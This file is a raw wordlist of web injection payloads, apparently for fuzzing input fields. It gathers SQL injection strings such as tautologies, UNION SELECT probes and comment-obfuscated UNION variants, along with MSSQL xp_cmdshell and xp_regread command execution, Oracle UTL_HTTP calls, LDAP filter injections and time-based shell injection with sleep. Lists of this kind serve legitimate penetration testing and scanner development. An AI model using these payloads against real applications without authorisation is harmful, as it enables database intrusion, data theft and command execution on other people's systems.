
!
"
" or "a"="a
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"%20or%20"x"="x
"' or 1 --'"
") or ("a"="a
#
%20$(sleep%2050)
%20'sleep%2050'
%21
%26
%27%20UNION%20Select%201,2--+
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
&apos;%20OR
&lt;&gt;&quot;'%;)(&amp;+
'
' (select top 1
' UNION ALL SELECT
' UNION SELECT
' or ''='
' or '1'='1'--
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1=1 or ''='
' or 1=1--
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' order by 1,2--+
'%20--
'%20;
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
') or ('a'='a
')%20or%20('x'='x
'--+
'; exec master..xp_cmdshell
'; exec xp_regread
'hi' or 'x'='x';
'or%20select *
'sqlattempt1
'||UTL_HTTP.REQUEST
(
(sqlattempt2)
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
,@variable
-
--
--';
--sp_password
/
//
//*
/?q='or''='
/?q=1
/?q=1 or 1=1
/?q=1"
/?q=1'
/?q=1' or '1'='1
/?q=1'||'asd'||'
/?q=1/*!1111'*/
/?q=1/*'*/
/?q=1\
/?q=1`
/?q=[1]
/?q[]=1
0 or 1=1
1;SELECT%20*
<>"'%;)(&+
=%20'
=%20--
=%20;
@variable
AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5 —
AND 0 order by 1—
PRINT
PRINT @@variable
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3D%20\x27
\x3D%20\x3B'
`
admin'--
as
asc
bfilename
char%4039%41%2b%40SELECT
delete
desc
distinct
exec sp
exec xp
handler
having
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
hi' or 'a'='a
hi' or 1=1 --
hi') or ('a'='a
insert
like
limit
or
or 0=0 #
or 0=0 --
or 1=1--
or%201=1
or%201=1 --
order by
procedure
replace
select
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
update
x' or 1=1 or 'x'='y
|
